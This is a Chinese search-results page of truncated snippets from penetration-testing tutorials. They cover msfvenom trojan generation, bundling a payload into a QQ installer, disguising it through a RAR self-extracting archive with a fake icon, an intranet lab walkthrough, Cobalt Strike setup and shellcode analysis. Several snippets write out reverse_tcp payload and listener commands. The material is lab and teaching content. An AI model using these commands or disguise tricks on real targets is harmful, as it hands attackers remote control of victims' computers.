首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

msf木马程序

捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个...这里就不设置了,默认返回端口是4444 -f: 代表要捆绑的文件类型,这里是一个exe文件 -x:指定你要捆绑的文件的路径及文件名,这里我选择的是root/dy/里的PCQQ2020.exe -o:指定生成木马文件的路径及文件名...附:msfvenom介绍 msfvenom简介 msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线...msfvenom生成 生成payload,有有两个必须的选项:-p和-f 使用-p来指定要使用的payload。...RAR有一个自解压的功能 我们可以利用这一点来达到目的 有两个文件,一个是刚刚生成木马文件,一个是一个txt文档 全部选中,右击添加到压缩文件,注意这里一定要用rar压缩方式 ?

1.8K62
您找到你想要的搜索结果了吗?
是的
没有找到

msf工具之木马程序制作以及伪装

本文转自行云博客https://www.xy586.top 文章目录 捆绑木马 RAR自动解压 捆绑木马 使用msfvenom制作木马程序: #生成木马文件 msfvenom -p windows...将木马文件放入靶机中 ?...multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.232.138 set lport 4444 run 将木马程序点击执行...RAR自动解压 设置自动解压运行 设置rar自动解压格式让它在解压时运行恶意程序 模拟文本文档钓鱼 改良木马程序: 伪装:将网页代码和app进行绑定,然后压缩,使用WinRAR创建自解压格式...文本和图标选项中,选择加载我们刚刚生成的icon图标 ? 生成了我们伪装过后的木马程序 ? 同时可以将文件名称改成比较长的名字,在不选中文件的时候,文件名后面部分会被隐藏,达到隐藏后缀名的效果

2.1K40

内网靶场实战——ATT&CK实战系列(四)

,接下来sessions 1 即可进入会话 方法二 除了利用冰蝎进行反弹shell,我们也可以通过生成msf木马,然后上传到服务器去执行来获取shell 具体如下 首先生成msf木马 msfvenom...GOARCH=amd64 go build main.go //编译生成 而后进入msf,将这个go文件进行上传 upload /tools/dockerrun/main 可以看到成功上传,接下来在...首先生成msf木马 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.129 LPORT=7777 -f elf >shell.elf.../ew_for_linux64 -s rcsocks -l 1080 -e 1234 然后用python服务的方式,将ew_for_linux64上传至Ubuntu,而后执行 chmod +x ew_for_linux64...,关闭防火墙并执行木马文件即可实现msf上线 net use \\WIN-ENS2VR5TR3N\c$ //控制域成员与域控建立一个ipc链接 msf生成正向连接木马 msfvenom -p windows

69650

CS系列-CobaltStrike的安装搭建

Cobalt Strike 2.0版 本主要是结合Metasploit可以称为图形化MSF工具。...客户端模式和服务端模 式可以在Windows以及Linux上运行这里要注意服务端模式在Windows下运行时有 可能会出现一些细小的问题不过影响不大。...Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe 木马生成,win dll木马生成,java木马生成,office宏病毒生成木马捆绑;钓鱼攻...CobaltStrike优点 ·Payload免杀优于Msf ·图形化界面方便操作 ·多人协同测试,高效合作 ·集成很多内网渗透工具及命令 ·可结合Msf联合使用 链接:https://pan.baidu.com...把linux的放到kali中,我放到opt目录下,这个一般都是存放软件的目录,然后unzip cobaltstrike-linux.zip解压 然后终端进入这个目录下,首先查看本机kali的ip地址,然后为一个文件提升下权限

6.4K20

msf生成的shellcode分析--走,组团分析shellcode呀

作者丨selph 分析 MSF Windows/exec Shellcode 最近分析漏洞用到msf生成的样本进行测试,其中用到payload选项为Windows/exec cmd="calc.exe"...实验环境 • 虚拟机:Kali Linux 2022.1 x64 • 物理机:Windows 10 21H2 家庭版 • 软件:x86dbg,scdbg,windbg,010 Editor 生成shellcode...使用Kali Linux生成shellcode: ┌──(selph㉿kali)-[~/桌面/shellcode] └─$ msfvenom -p windows/exec cmd=calc.exe...-f raw -o shellcode.bin [-] No platform was selected, choosing Msf::Module::Platform::Windows from the...这里通过下面模板的表格去找对应的偏移即可辅助理解分析中用到的结构,跟着shellcode的反汇编中给出的偏移去找结构,本文中足够用了 具体操作这里就不再介绍,有需要深入了解可自行学习 分析shellcode 准备工作 把生成

2K00
领券